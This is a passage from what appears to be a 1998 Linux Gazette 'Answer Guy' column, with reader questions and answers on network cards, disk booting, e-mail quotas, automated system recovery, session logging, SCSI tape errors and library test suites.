If you already purchased the C/X and you already selected Linux for this project then shame on you --- you really need to do requirements analysis before committing to various implementation details (specific hardware and software). (If you're just stuck with some stuff you had laying about for a skunkworks project --- then my condolences; you might need to negotiate some funding for it).

(?)NE2000 "clones" --- not "cloney" enough!

From Jack on 08 Oct 1998

Hi, I am a huge fan of Linux and all that GNU stands for. I got my first taste of Linux back in the 0.99 days. Since that time I have poked and prodded along with different flavors of installation, but due to my work environment I have never been able to jump in with both feet. I have finally scraped together a modest system for my home use that I can dedicate to Linux, and wanted to get it set up as a network server. I have been reading articles, HOWTOs, and the like about setting up network access. Each of the refrences have always begun past the step where I am getting hung up. I cannot get the system to recognize my eithernet card.

True it is an NE2000 clone (cheap), but Win95 recognizes it just fine and the software packaged with it has no trouble locating the card, nor does the plug-n-pray BIOS. I read the Eithernet-HOWTO which tells about issuing commands during the lilo startup and tried that with the values returned from the packaged diagnostic software. I'm hoping this is just something I'm overlooking or mis-read or didn't read(yet), and not a situation where I need to upgrade the ethernet card (my last option). I came to you as my next to last option since you have given so many people good advice in the past. I hope you can help and look forward to hearing from you soon.

Jack.

(!)Replace the ethernet card. Go get a Netgear (Tulip based) or a 3Com (3c509).
I had exactly the same problem when I first tried to configure a Linux system to use some NE2000 clone.
It probably has nothing to do with Plug-n-pray or IRQ's or I/O ports, or kernel drivers, or options, or your ifconfig command. I tried everything with that card --- and it just plain wasn't recognized!
Trust me. You can spend $30 (US) or less on a supported ethernet card and it will almost certainly just work. Or you can spend the same hours I did thinking "I must be stupid" and then go buy the card.
The term NE2000 should be taken with a large block of salt (the kind we use to haul out to the horse pastures when I was a kid). They are "NE2000 compatible" in about the same way as a "winmodem" is "Hayes compatible" --- only when you use them through the "supported" software.
True hardware level compatability involves using the exact same sets of I/O ports and other adnctions as the original. Most of the cheap NE2000 just aren't compatible, they have to supply their versions of the drivers --- and they only achieve "compatibility" through the software interfaces.

(?)The Infection and the Cure: (Good Times as a Virus)

From [email protected] on 23 Oct 1998

You're certainly entitled to your opinion, and you could get much response and satisfaction (if you are troll) by

I think I had been troll by sending my mail to the Answer Guy.

(!)I didn't think you were trolling me.

(?)None of this is relevant to Linux. Most Linux users are sophisticated enough to simply ignore these threads (clearly I fail that test, myself).

I apologize. I had found the Linux Gazette lately and read many of the issues in the last days. I was impressed by your column and I am now enlighted, that I've contacted you in the wrong context. I hope I will think more about what to send to whom in the future.

(!)No apology is necessary. You stated an opinion, I disagreed with it. The discussion is mildly offtopic. I pointed that out.

(?)Some have referred to "Good Times" hoaxes as "mental viruses" --- more power to them. By their token *you* have been infected since you have revived (brought back to life) the discussion.

Yeah, I should be more careful on the decision where I put my focus on.

Hope I stole not too much of your time.

(!)No problem. I'm the one that volunteers for this gig.

(?)Yours, Peter Wiersig

(If any of the above don't make much sense, maybe because english is not my first language.)

(!)Sometimes I'm not sure my English is up to snuff either.

(?)More on International Keyboard Mappings and Monochrome X

From Axel Harvey on 08 Sep 1998

Further to my verbose text of last night. I realized after spouting away that accent and symbol keys will not elicit any response from the shell command line (except a rude beep) but they do work perfectly well in text-receiving functions like pico and pine. I, poor sap, had been modifying and reloading my test keymap, then seeing if the keys worked from the command line...!??!

I should have mentioned that the RedHat distribution has a French keyboard which works, but I don't find the layout very useful. I shall send them my own version of a French keyboard as soon as I have refined it sufficiently.

(!)Yep.

(?)I still don't understand my problem with X installation.

(!)Have you tried the suggestions I already gave?

(?)Are you plagued by questions from stupid guys who could solve their own mysteries with one more hour of futzing?

(!)That's not stupidity. Hours of "futzing" is experience. I personally feel that the hours of "futzing" that I've done should benefit others besides myself.
However, I am plagued by questions that are more readily answered in HOWTO's and even some questions that I can only categorize as stupid (like phreak/cracker wannabe's and jobhunting AS/400 specialists).

(?)Suggestions for Linux Users with Ultra Large Disks

From Tom Watson on 09 Sep 1998

Answer guy:

In several questions, I see people asking about booting large disks with older machines. A while ago I built up a machine like this, and had a reasonable solution.

While I can understand that the problem is often interference with the "other" operating systems, in the case I used, I had an older '486 motherboard which given the requirements for windoze was a bit out of date, but quite reasonable for Linux. In attempting a "normal" installation on the larger disk, the first (root) partition was quite a bit over the 540 MB BIOS limitation. It took me a few attempts at running LILO and understanding its error messages (I even tried the "linear" option) to understand the problem (I hadn't used a disk that large before). When I remembered the "540MB" problem, the solution that I explained above seemed the "easiest" to implement, and with the least amount of "hassle". It only took a few symbolic links/copies and I was done. The "basic" root partition was still intact, and nobody really worried about the difference. I feel that if I wanted to, I could have made a "small" partition and installed the "root" files there, but most installations want a larger partition to get "the whole works" installed.

Sure this gets around the "1024 cylinder" problem, but usually that is all that is needed. Linux, once it has started the kernel, supplies the drivers for further operation. The small partition is only used to accomidate the BIOS, whose ONLY function is to load the kernel anyway.

I suppose an altrenative is to use "loadlin" under dos, but you still need to boot DOS, and the 1024 cylinder problem comes up again.

I'm trying to get a solution that involves "minimum impact".
-- Tom Watson         I'm at work now (Generic short signature)

(!)All true enough. My point is that my answers are not simply intended to show what works for me or what is minimum impact for one situation (usually a situation about which I'm given very little information). My answers try to cover a large number of likely situations and to suggest things that no one seems to have tried before (like the auto-rescue configuration I was babbling about).
I've frequently suggested small partitions, LOADLIN, alternate root partitions, even floppy drive kernels.
Another problem --- the source of this whole thread has to do with support for these Ultra-DMA drives that are over 8Gb. I guess that the most recent kernels (2.0.35 and later?) have support for a different IDE driver that can handle these. I thought I'd seen reports of problems with them. I commented on this in the hopes that someone would give me the scoop on those.

(?)Query

From Christopher & Eunjoo Kern on 21 Oct 1998

Mr. James Dennis:

I had been given your name as a reference from a coworker of mine. He has told me that you often answer the most difficult of questions regarding Windows 95 and Linux software. Are you indeed the fellow my friend speaks of, and could you possibly answer a question or two of mine?

Kern.

(!)I actually answer Linux questions. I get alot of Win '95 questions, which I grudgingly answer to some small part of my extremely limited ability.
Although I bump into Win '95 occasionally at my customer's sites and with some friends, I probably have clocked in less than 10 hours of "driving time" on it and NT and Win '98 all told.
I answer Linux questions for free for the Linux Gazette. You can see many of those by pointing your web browser at: http://www.linuxgazette.com (they also have a nifty search feature).
Linuz Gazette is part of the Linux Documentation Project (LDP: http://www.sunsite.unc.edu). That's the best resource for basic Linux information.
So, what are your questions?

(?)Conflict: Num-Lock, X Window Managers, and pppd

From Victor J. McCoy on 11 Oct 1998

Please publish this. After the original question, I received a number of inquiries indicating that I'm not the only one with this problem.

Last year LG22 (Oct97) I asked a question regarding window manager and pppd anomaly.

Quick answer: Num-Lock key activation.

Long answer:

I finally got fed up with the problem, so I tore my machine apart, down to a single SCSI controller (with only my root drive), keyboard, modem.

The problem continued. I upgraded to redhat 5.0 since, and the problem persisted, different Window managers also exhibit problems (just differently). I even changed to Caldera lite 1.2, and I still had the problem.

Believe it or not, it turned out to be my NUM-LOCK key. If NL is active, then the WM screws up EVERY TIME; different WMs just screw up differently. I would turn on Num-lock to ping a host IP addr and that would be all it took.

I have a MS natural keyboard (Of all the products MS has, software sucks, but I love the hardware [KB and Mouse].) I'm sure that's not the problem, because I've only recently acquired the KB and the problem has been around for a couple of years.

I would like to know if this is a widespread problem. Surely, I'm not one of very few people to use the numeric keypad.

Victor J. McCoy

(!)I'll just let this message speak for itself. I'm not really sure what it's saying but it sounds like a call for other people to do some testing. What happens if you have your NumLock key active when you start up and user your ppp link from within an X session.
As for ways to try to alleviate the problem:
... I don't know of good ways to troubleshoot or isolate this, off hand. Look in your syslog (/var/log/messages) for "ooops" or similar messages from the kernel. Try strace on the X server and the window managers, the pppd (also run it under full debugging and kdegug). Try adding ipfwadm (or ipchains) rules with the -o switch (to "output" details of every packet to your syslogs). You could also capture tcpdump's from the ppp0 interface during the whole affair.
It's probably something specific to your hardware --- since you've changed your software completely. I'll be curious if you can isolate the problem to a specific library function or system call.

(?)Quotas for Outgoing e-mail

From tng on 14 Sep 1998

I've been searching for 3 days on setting up some kind of e-mail quota to restrict the abount of e-mail that can be sent by aparticular person. I been to altavista did a search that turned up 1700 maches none of which were of any help. I went to sendmail.org and browsed their their online documentation, gone through news group archives to find myself still wondering if there is software available to do it. I found lots of info about setting up bulk e-mailers and stopping incomming spam but nothing for stopping my local users from bulk e-mailing and spamming others. I would be greatful for any help on this matter.

thanks in advance... tng

(!)Well, that's a new one. I don't know of any package that does this.
I'm sure it can be done --- you could define a custom mailer (one of those funny looking Mprog lines in a sendmail.cf file). Let's call this the quota mailer --- you'd then define that as the mailer to over-ride the built-in smtp mailer. You're quota mailer could then be reponsible for counting messages, addresses, bytes, etc and updating a database of authorized users and relayers --- and then relaying the mail into a queue where a different sendmail (using a different configuration) would send it out (probably as a regular 'cron' job).
The quickest way to get such a beast built might be to hire a consultant like Robert Harker (he specializes in 'sendmail' and teaches tutorials in it http://www.harker.com).
For qmail or VMailer there might be an easier way.
Another problem you'll have with this is that you'd have to prevent people from bypassing all of your mail user agents and sending their mail using some custom program that they've installed themselves. This could work by simply opening a TCP connection to the smtp port (25) of their addressee's sites (or any open relayer) directly. You'd have to put packet filters on all of your egress routes (firewalls and border routers) to prevent this, thus forcing your customers/user to use your outbound relay.
There are several commercial products that do filtering of outbound mail (MIMESweeper, WebShield, that sort of thing). They purport to protect companies from insiders who might be mailing company secrets out to their competitors. In general I think this is a pathetic approach to the risk (they can easily shove the data on a diskette, Zip disk or whatever, and mail it; or they can encrypt it --- using pkzip with it's "scramble" encryption and mail that as a "bitmap" --- or they can use freely available tools to do some serious steganography).
However, these "mail firewalls" may be adaptable to your needs. Also, there may be some free one floating around that I haven't heard of.
The best place to ask for more info on this is in the comp.mail.sendmail newsgroup (I don't know of a general mail transfer agents newsgroup -- so c.m.sendmail seems to get all of that traffic. I expect there'll be a comp.mail.qmail and a comp.mail.vmailer eventually).
I suppose you could also ask in comp.security.firewalls --- and you could dig up the mailing lists for qmail, VMailer and the firewalls mailing list (which recently moved off of Brent's site at Great Circle Associates and is hosted by some friends of his at GNAC) --- you'll have to spend some quality Yahoo!/Deja News/Alta Vista time hunting down those venues.

(?)Automated Recovery from System Failures

From anonymous on the L.U.S.T List on 2 Sep 1998

And there will be no human to manually check on the partitions after a power failure.

What's wrong with e2sck? TTYL!

(!)I was thinking about this recently and I came upon an intereseting idea. (I think a friend of mine used the following trick in a commercial product he built around Linux).
The trick is to install two root filesystems (preferably on different drives -- possibly even on different controllers). One of them is the "Rescue Root" the other is the "Production Root." You then configure the "rescue root" partition as the default LILO device and modify the shutdown sequence to over-ride that default with an /sbin/lilo -R command.
If the system boots from the rescue root it is because the system was booted irregularly. The standard shutdown sequence was not run. That rescue root can then do various diagnostics on the product root and other filesystems. If necessary it can newfs and restore the full production environment (from another, normally unused, directory partition or drive). The design of the rescue root is a matter for some consideration and research.
Normally the system will boot into "production" mode. Periodically it can mount the alternative root fs to do filesystem checks and/or an extra filesystem to do backups (of changes to the configuration files). You can ensure that these configuration backups are done under a version control system so that degenerative sets of changes can be automatically backed out in an orderly fashion.
If you combine this with a watchdog timer card and a set of appropriate system monitoring daemons (which all talk to a dispatch that periodically resets the watchdog timer), you should have a system that has about the most bulletproof autorecovery as is possible on PC equipment.
I should note that I haven't prototyped such a system yet. I've just thought of it. A friend of mine also suggested that we devise a way to have another proximate system also doing monitoring (possibly via a null modem). He says he knows how to make a special cable which would plug into the guard dog's printer/parallel port (guard dog is what I've been calling the hypothetical proximal system) and would be run into the case of the system we're monitoring where it would be fit over the reset pins. This, with a small driver should be able to strobe the reset line.
(In fact I joked that we could create a really special cable that would daisy chain to as many as eight other systems and allow independent reboot of any of them).
In any event the monitor system would presumably monitor some/most of the same things as the watchdog timer; so I don't know what benefit it would ultimately offer (unless it was prepared to do or initiate failover to another standby system).
Perhaps this idea might be of interest to the maintainer of the High-Availability HOWTO (Harald Milz -- whom I've blind copied on this message). It's not really "High Availability" but "Automated Recovery" which might be sufficiently close for many applications. (i.e. if a web, mail, dns, or ftp server's downtime can be reduced from "mean hours per incident" to "mean minutes per incident" most sysadmins still get lots of points).

(?)Automated Recovery from System Failures

From R P Herrold on 04 Sep 1998

(!)We build custom Linux solution boxen. In our Build outline, we take this concept a step further in setting up a redhat system -- we carry a spare /boot partition:

(extract)
(base 5.0 install)

Part     name            size    Cyl     cume    actual min
====    ==========      ====    ====    ====    ==========

 1       /boot           20      ___      20
 2       root            30      ___      50     23
                         (/bin           ___ M)
                         (/lib           ___ M) modules
                         (/root          ___ M)
                         (/sbin          ___ M)
 3       swap            30      ___     80
 4       (extended)
 5       /mnt/spare      30      ___     110     1

... The minima in a 'stripped down' / [root] partition vary depending on where /lib, /var, and /usr end up -- of late, a lot of distributions' packages feel a need to live in /bin or /sbin unnecessarily -- and probably should be in the /usr tree ... Likewise, if a package is NOT statically linked, one can end up with problems, if a partition randomly decides to 'go south.'

(!)I was thinking about this recently and I came upon an intereseting idea. (I think a friend of mine used the following trick in a commercial product he built around Linux).

(!)... We use the 'trick' as well

(!)The trick is to install two root filesystems (preferably on different drives -- possibly even on different controllers). One of them is the "Rescue Root" the other is the "Production Root." You then configure the "rescue root" partition as the default LILO device and modify the shutdown sequence to over-ride that default with an /sbin/lilo -R command.

(!)... carrying the full [root] partition

(!)I should note that I haven't prototyped such a system yet. I've just thought of it. A friend of mine also suggested that we devise

(!)... It works, and can avoid the need to keep a live floppy drive in a host which would otherwise require one for emergency purposes ... aiding in avoiding physical security issues

[ normally I remove sig blocks, but since he copyrighted his... I guess I'll leave it in. Curious one should post a copyright into open mailing lists, though. -- Heather ]

.-- -... ---.. ... -.- -.--
Copyright (C) 1998 R P Herrold
NIC: RPH5 (US)
My words are not deathless prose,
but they are mine.
Owl River Company 614 - 221 - 0695
"The World is Open to Linux (tm)"
... Open Source LINUX solutions ...


(?)Re Script

From Joe Wronkowski on 23 Oct 1998

Hi Jim,
I was just wondering if there was an easy way to grab the time/date Oct 6 21:57:33 from the same line the 153.37.55.** was taken from. If you are busy I understand.

Thanks
Joe Wronkowski

(!)The following awk expression will isolate the date and time from these example lines:
date="$1 $2"
time="$3"

(?)sample of log file:

Oct  6 21:50:19 rogueserver in.telnetd[197]: connect from 208.224.174.21
Oct  6 21:50:24 rogueserver telnetd[197]: ttloop:  peer died: Success 
Oct  6 21:55:29 rogueserver in.telnetd[211]: connect from 208.224.174.21
Oct  6 21:55:35 rogueserver telnetd[211]: ttloop:  peer died: Success 
Oct  6 21:57:33 rogueserver in.pop3d[215]: connect from 153.37.55.65
Oct  6 21:57:34 rogueserver in.pop3d[215]: Servicing request for rogue

The original message in this thread appeared in Issue 31, and the comp.unix.questions newsgroup. This volley resulted:


From Michael Schwab on 30 Sep 1998

Hello, I just read the article about

So please don't say "WHO CARES ABOUT THAT?"

(!)I'll say what I bloody well feel like saying!
(And I expect my editors, and readership to respond as they see fit).
I'm sorry if that seems like a harsh thing to say but frankly I think you missed the whole point of what I was trying to say before.
First, I don't know of a general way to get the connect speed. It's probably modem specific, so you could probably write a script that queries your modem to get the info. Your script would probably not work with most other modems, and you'd have to hack it into whatever communications package you were actually using on that modem (pppd, uucico, minicom, kermit, slip, whatever).
Another point I made is that the speed is likely to fluctuate frequently throughout the duration of a connection (particularly with any 28.8 or faster modem). It's likely to start out a bit high and be adjusted downward until the corrected error rate attains an suitable threshold.
So, if you had your script reporting a connection speed at one instant --- it would tell you almost nothing about your sustained throughput.

(?)I do !!

(!)More power to you. I didn't ask who cares? I asked what benefit those who "think" they care hope to derive from this statistic.
I can test the temperature in my house to with an arbitrary precision. However, the numbers on a thermometer will not motivate me to reset my thermostat or go out and buy a new furnace or air conditioner. It's a meaningless statistic that is no benefit to me.
Also there isn't just one temperature in my home -- there's a whole range of fluctuating temperatures. So precise measurement would be non-trivial.
For subjective issue there's no point in going to great measurement effort. When I'm cold I either turn up the thermostat, or (more likely) toss on a sweater or some little fuzzy booties.
Now, it is the case that I might do some measurements when I'm troubleshooting a line. I'd certainly expect a telco technician to do so if I was complaining about line quality --- and I might do so to "motivate" a telco (or to file my complaint with a public utility commission).
If course if I was really serious about a line quality issue I'd rent an oscilloscope and look through a Fluke (TM) catalog to find a chart-strip recorder for the job.
So these numbers aren't completely useless in all contexts. However, the number of people who can make reasonable use of them is fairly limited.

(?)How can you tell the connection speed that a modem auto-negotiates when dialing an ISP? My system log (/var/log/messages in RH5.1) does tell me the line speed I have set in the chat script, but I would like to know the connect speed as well (56K, 33.6, etc). I know this info must be available somewhere/somehow.

(!)Modern modems don't just auto-negotiate at the beginning of a call. The "retrain" (negotiate speed changes) throughout a call's duration.
You'd "like" to know. Put what would you do with this? Order you phone company to pull new copper to your house? Return your modem and try another one? Switch to tachyon beams?
As for "this info must be available" --- look in the programming manual for your modem, if you can find one. It used to be standard for modems to come with a pretty decent technical manual --- providing details on a couple hundred AT commands that comprised that manufacturer's extensions beyond the based "Hayes" set for that particular model. These days you'll be lucky if you pry a dinky little summary of a tiny subset of their diagnostics and commands out of most of these manufacturers.

(?)I don't know how to really get the connect speed but that might be not so important. Since I have a leased line to the Internet with a modem it is important for me to know how fast my line is running because sometimes this Line might have a lot of noise on it and the connect might be only 4800 bps instead of 33600 bps. In this case I have to call my Telecommunications provider to check the line !!!

(!)If your connection varies by this much you'll know it. You won't need any numbers to tell you that it's *slow*.
If you are trying to serve your customers (web site users, whatever) over this line --- it does make sense to monitor the bandwidth and latency. However these are higher level networking issues that are only marginally related to the underlying connection speed.

(?)But its easy to detect just send a ping to the other side when the line has low traffic. I do this by sending approx 20 pings and then look at the (lowest) roundtrip time. You can send a ping containing 8192 or 16384 bytes of data and you will detect nearly every change in bandwith.

(!)Aha! Now this is a totally different metric. You aren't measuring "modem connection speed" you're measuring latency and throughput! Doing this once every two or three hours with about 5 pings and setting "watcher" to monitor those and warn you when the latency get's too high or the throughput gets too low would make sense --- for a dedicated line where you are concerned that you customers/users are waiting "too long" for their traffic.
There is a package called MRTG --- the "multi-router traffic grapher" which can be used to create web page graphs of your network traffic statistics over time. It seems to be primarily used by larger sites for ethernet. However it might have some facilities for monitoring PPP (even SLIP) lines.
Actually MRTG depends on SNMP so I should say that you might figure out how to configure the CMU SNMP agents for Linux to interface to your serial interfaces --- and then MRTG could provide the graphs. However, you don't technically need to run SNMP under MRTG --- their docs suggest that you can use various commands to provide it statistics to graph.
You can read more about MRTG at:
http://ee-staff.ethz.ch/~oetiker/webtools/mrtg/mrtg.html

(?)Best Regards Michael Schwab


(?)RE how to find out the serial connect speed of a modem

From Michael Schwab on 30 Sep 1998

OK the Intention of the Mail send by me was mainly to give a short help on what might be a suitable answer on the quistion posed in Linux Gazette. Despite of this THANKS FOR YOUR VERY LONG MAIL, now it's much clearer what you were saying and why. I agree with you when you say the connect speed is unimportant because it changes anyway during the connectiontime. Sinec the guy who send the question to you said that he connects to his ISP so I suggested that might monitoring bandwith ans latency also might be more meaningfull for him than just getting the connect speed !

Anyway thanks for your Answer .....

see you soon

Michael Schwab


(?)Telnet/xterm: Log to file

From Jason Joyce on 07 Oct 1998

How can you log a telnet session using it from an xterm in Linux? I need to create a log of my actions during a telnet session, and I know that you can do it using telnet under Microsoft. And I know that if those guys have it, then they must have copied it from somewhere, and so I believe that it is possible using Linux, but I can't find any way.

Thanks for any help, Jason

(!)You can run the 'script' command (which creates a "transcript" named "typescript" by default.
You can also run the 'screen' utility, which, among many other features, allows you to take open multiple screen sessions through one virtual console, telnet, xterm, or even dial-up VT100 sessions and dumb terminals. Think of having all the power of your virtual consoles from any sort of terminal/shell session. You can do screen snapshots, open and close log files, view a backscroll buffer (with 'vi' like search features), mark and paste text (keyboard driven), do a screen lock, and even detach the whole screen session from your current terminal, xterm or whatever (and re-attach to it from any login, from that or any other terminal, later).
I routinely run 'screen' for all my sessions. When I log into one of my ISP shell accounts I prefer to run 'screen' at the far end because it will auto-detach if my modem disconnects me. So, I can redial, re-attach and resume my work. I can also dial into my home system, do a 'kill -HUP' on my screen process (actually a 'screen -d -R' will auto located, HUP, and re-attach all at once) and continue working on all ten of the interactive programs that I had running at the time.
There are other ways you can do this. There was a sample script in 'expect' that did this in about 10 lines of TCL/expect code.
You can also use Kermit (ckermit, from Columbia University). This is a communications package, file transfer package and network client. I wrote an article for SysAdmin Magazine about a year ago to describe its use as a telent/rlogin client.
In addition to be fully scriptable and supporting the same file transfers over TCP/IP as it does over any serial connection; it's also possible to do logging and exentisive debugging using Kermit.
The next version (currently still in beta?) should support Kerberos authentication and encryption (one of several enhancements that I beat up on Frank de la Cruz --- it's principal author and co-ordinator --- about while researching my article).
So, there's about four options off the top of my head.

(?)Finding Soundcard Support

From Nathan Balakrishnan on 23 Oct 1998

Hello,

Do you know wheather YAHAMA OPL3-SAx WDM soundcard is directly supported by Redhat 5.0 and how would I go about setting it up under Linux if it isn't?

NATHAN

(!)The best source of information on this subject is probably the "The Linux Sound HOWTO" (http://www.ssc.com/linux/LDP/HOWTO/Sound-HOWTO.html) by Jeff Tranter <>.
I think most of the kernel sound support was originally donated by Hannu Savolainen <> of 4 Front Technology (http://www.4Front-Tech.com/oss.html) which also sells their "Open Sound System" package (for about $20 US (presumably)).
The version that's included with Linux is known as OSS/Free while OSS/Linux is 4 Front's commercial version. They also support sound drivers on numerous other versions of Unix.
I guess there is an independent "Linux Ultra Sound Project" (http://home.pf.jcu.cz/~perex/ultra) which a list of or "Advanced Linux Sound Architecture" which includes your model on their list of supported cards (http://alsa.jcu.cz/src/soundcards.html).
So, try reading those and see if that helps. I personally have almost never used any sound cards. My computers make enough noise with all those fans and disk drives.

(?)Problems with a SCSI Tape Drive

From Ralf Schiemann on 23 Oct 1998

Hi, I've a problem with backing up our file server (Linux 2.0.33). Attached to the server is a HP C1557A SCSI TapeLoader (6 x 24 GB). Actions on the loader are done without any problems (e.g. loading and unloading of tapes).

But if I try to do a backup via tar (tar cvf /dev/st0 /tmp) the tape display is telling me "Write" and after a short while "Tape Position lost". In /var/log/messages I find the following errors:

kernel: st0: Error with sense data: extra data not valid
Deferred error st09:00: sense key Medium Error
kernel: Additional sense indicates Sequential positioning error
kernel: st0: Error on write filemark.

Can you tell me whats going wrong?? Any help is welcome,
Ralf

(!)I would look at SCSI termination and cabling problems. It sounds like commands are getting through the interface just fine, and streams of data are causing the problem.
You don't say what kernel version nor which SCSI adapter and drivers you're using. If this is a modular kernel, try compiling the appropriate SCSI driver directly into it (to eliminate any chance of anomalies with automatic loading and removal of the SCSI drivers by kerneld, etc).
Try compiling a very minimal kernel with just the drivers you need to do your backup. You want to see if there's some strange conflict between your drivers.
Finally you might try testing this with a different SCSI adapter, with no other peripherals on it and the best cable you can buy. Is this an internal or external unit? I'm guessing external since DAT autochangers are pretty big for internal drive bays).
If you can afford it, it's best to put your SCSI tape drive on a separate SCSI card (a fairly cheap $60 ISA card is fine). This allows you to put the tape drive off that system without having to reboot, and it maximizes performance on the other bus.

(?)Test Suites for GNU and other Open Source (TM) Software

From Steve Snyder on 20 Sep 1998

Is there a validation test suite for glibc v2.0.x? I mean a more comprehensive set of tests than are run by "make check" after building the runtime libraries.

(!)Not that I know of. I guess the conventional wisdom is that if I install glibc, and a bunch of sources and I compile the sources against the libc and run all of them --- that failures will somehow be "obvious."
Personally I think that this is stupid. Obviously it mostly works for most of us most of the time. However, it would be nice to have full test and regression suites that exercise a large range of functions for each package --- and to include these (and the input and reference data sets) in the sources.
It would also be nice if every one of them included a "fuzz" script (calling the program with random combinations of available options, switches and inputs --- particularly with a list of the available options). This could test the programs for robustness in the face of errors and might even find some buffer overflows other bugs.
However, I'm not a programmer. I used to do some quality assurance --- and that whole segment of the market seems to be in a sad state. I learned (when I studied programming) that the documentation and the test suite should be developed as part of the project. User and programmer documentation should lead the coding (with QA cycles and user reviews of the proposed user interfaces, command sets, etc, prior to coding.
The "whitebox" test suites should be developed incrementally as parts of the code are delivered (if I write a function that will be used in the project, some QA whiteboxer should write a small specialized program that calls this function with a range of valid and invalid inputs and tests the function's behaviour against a suite that just applies to it).
Recently I decided that md5sum really needs an option to read filenames from stdin. I want do write some scripts that essentially do:
'find .... -print0 | md5sum -0f '
... kind of like 'cpio' Actually I really want to do:
'rpm -qal | regular.files | md5sum -f'
... to generate some relatively large checksum files for later use with the '-c' option. This 'rpm' command will "Query All packages for a List of all files. The regular.files filter is just a short shell script that does:
#!/bin/sh
## This uses the test command to filter out filenames that
## refer to anything other than regular files (directories, 
## Unix domain sockets, device nodes, FIFO/named pipes, etc) 
while read i ; do
        [ -f "$i" ] && echo "$i"
done
So I grabbed the textutils sources, created a few sets of md5sum files from my local files (using 'xargs'). Those are my test data sets.
Then I got into md5sum.c, added the command options, cut and pasted some parts of the existing functions into a new function, and what able to get it cleanly compiling in a couple hours. I said I'm not a programmer didn't I. I think a decent programmer could have done this in about an hour.
Then I ran several tests. I ran the "make check" tests, and used the new version's -c to check my test sets. I then used same script that generated those to generate a new set using the new version/binary. I then compared those (using 'cmp' and 'diff') and checked them with the old version. Then I generated new ones (with the new switch I'd added, and again with the old version) and cross check them again.
This new version allows you to to use stdin or pass a filename which contains a list of files to checksum --- it uses the --filelist long argument as well as the -f short form; and you can use -f - or just -f to use stdin. I didn't implement the -0 (--null) option --- but I did put in the placeholders in the code where it could be done.
The point here is that I had a test suite that was longer than the code. I also spent more time testing and documenting (writing a note to Ulrich Drepper, the original author of this package to offer the patches to him) than I did on coding.

(?)Though a benchmarking component would be nice, my main concern is to verify that all (or at least the vast majority) of the library function work correctly. What I want to know is, given a specific compiler and a specific version of glibc source files, how can I verify that the libraries built are reliable?

(!)By testing them. Unfortunately, that may mean that you'll have to write your own test suites. You may have to start a GNU/new project to create test suites.
It is likely that most of the developers and maintainers of these packages have test suites that they run before they post their new versions. It would be nice if they posted the test suites as part of the source package --- and opened the testing part of the project to the open development model.
In addition these test suites and harnesses (the scripts to create isolated and sample directory structures, etc) to run a program (or library) through its paces) would serve as a great addition to the documentation.
I find 'man' pages to be incredibly dense. They are find if you know enough about the package that you are just looking for a specific feature, that you think might be there, or one that you know is in there somewhere --- but you don't remember the switch or the syntax. However, a test harness, script, and set of associated inputs, outputs, and configurations files would give plenty of examples of how the bloody thing is supposed to work. I often have to hunt for examples --- this would help.

(?)The specific version I want to test is the glibc v2.0.7 that comes with RH Linux v5.1 and updated after 5.1 release by package glibc-2.0.7-19.src.rpm. I think that such a testsuite, though, if it exists, would be applicable to any platform.

(!)I agree. I just wish I could really co-ordinate such a project. I think this is another example where our academic communities could really help. Before I've said that I would like to see the "adopt a 'man' page project" --- where college and university professors even high school teachers from around the world assign a job to their students:
Find a command or package for Linux, FreeBSD, etc. Read the man pages and other docs. Find one way that the command is used or useful that is not listed the "examples" section of that man page. Write a canonical example of that command variant.
... they would get graded on their work --- and any A's would be encouraged (solely at their option) to submit the recommended example as a patch to the maintainer of the package.
Similar assigments would be given for system calls, library functions, etc (as appropriate to the various classes and class segments).
Along with this, we could have a process by which students are encouraged to find bugs in existing real world software --- write test suites and scripts to test for the recurrence of these bugs in future versions (regressions), and submit the tests to that package's maintainer.
The problem with all of this is that testing is not glamorous. It is boring for most people. Everyone knows Richard M. Stallman's and Linus Torvalds' names --- but fewer people remember the names of the other programmers that they work with and no one know who contributed "just the testing."
There are methods that can be used to many detect bugs quicker and more reliably than by waiting until users "bump into" them. These won't be comprehensive. They won't catch "all" of the bugs. However, people will "bump" into enough bugs in normal usage, even if we employ the best principles of QA practice across the board.
Unfortunately I don't have the time to really devote to such a project. I devote most of my "free" time to the tech support department. I do have spare machine cycles. could gladly devote time to running these tests and reporting results. Obviously some tests require whole networks, preferably disconnected ones, on which to run safely. Setting up such test beds, and designing tests that return meaningful results is difficult work.
I personally think that good test harnesses are often harder to design than the programs that they are designed to test.

(?)Thank you.
***** Steve Snyder *****


(?)All that Vaunted Support for those Windows Users

From prince20 on 14 Sep 1998

Hi

My Favorites Folder was converted to a shell file after I reinstalled Windows95 and Internet Explorer 4.01SP.

(!)What is a "shell file"?

(?)Yeah you guessed it I did not back up the folder. The problem I have is that I can not open the shell file. I have used every method I know but nothing is happening.

Do you know of a tool or a way to open the shell file? Please Email me. Your help is appreciated.

(!)I'd look at it in 'vi' if it was on my system. However, that probably isn't very helpful.

(?)Thank You

(!)Where did you get this address and why did you mail this question to me? I volunteer time to answer Linux questions. I don't run Win 95. Microsoft and other commercial software companies are supposed to have their own tech support departments. If those sources of support are failing you --- perhaps you should reconsider your software purchases.

(?)Another Non-Linux Question

From [email protected] on 08 Oct 1998

I have been trying to connect my brothers PC in Louisville with mine in Atlanta using his Win95 dial-up as a client and mine as nt4.0 ras server.

(!)I'm the "Linux Gazette Answer Guy" --- call Microsoft's tech support with our questions about their OS.
If you'd like to try Linux at either end of this connection --- be sure to look through some of our HOWTO's and guides at: http://sunsite.unc.edu/LDP (Linux Documentation Project).

(?)We have tried with different protocols, and our workgroups, user names and p/words matching but with no success.

He can dial from win95, but mine does not respond at all. So I thought my modem which is not listed in misrosoft's HCL, is CPI Viva 33.6 CommCenter. I know for sure that my modem could not automaically answer the call under nt4.0, because when I set up my server as Win95 Dial-up server the modem answered and we made the connection. I even tried to edit the modem log for my modem type incase if it works, but I didn't know how to edit the log.

Is there any method you can think of how to solve this problem. I want to use my nt4.0 RAS to connect to Win95 Dial-Up client. Please help me.

(!)I want to stop getting questions for some OS that I don't run, a derivative of one that I abandonned a half decade ago. Please help me. Call Microsoft (or hire an MCSE, or try your modem vendor).

(?)Thank you. Zeki

[ All of you folks interested in MS-Windows rather than the Linux environment might find http://www.fixwindows.com/ handy; it's run by MCSE's, so I suppose in a worst case, you know where to hire someone. But before you go that far, they have a vendor phone listing, and some hints for effective troubleshooting. There's also a newsgroup heirarchy for your environment.

If you are considering switching and you like experimenting, you might help out the WINE Prohect at http://www.winehq.com/, run a copy of WinOS/2 under Dosemu (http://www.suse.com/dosemu/), or try any of the growing number of major applications available in both environments. -- Heather ]


(?)Macro Virus?
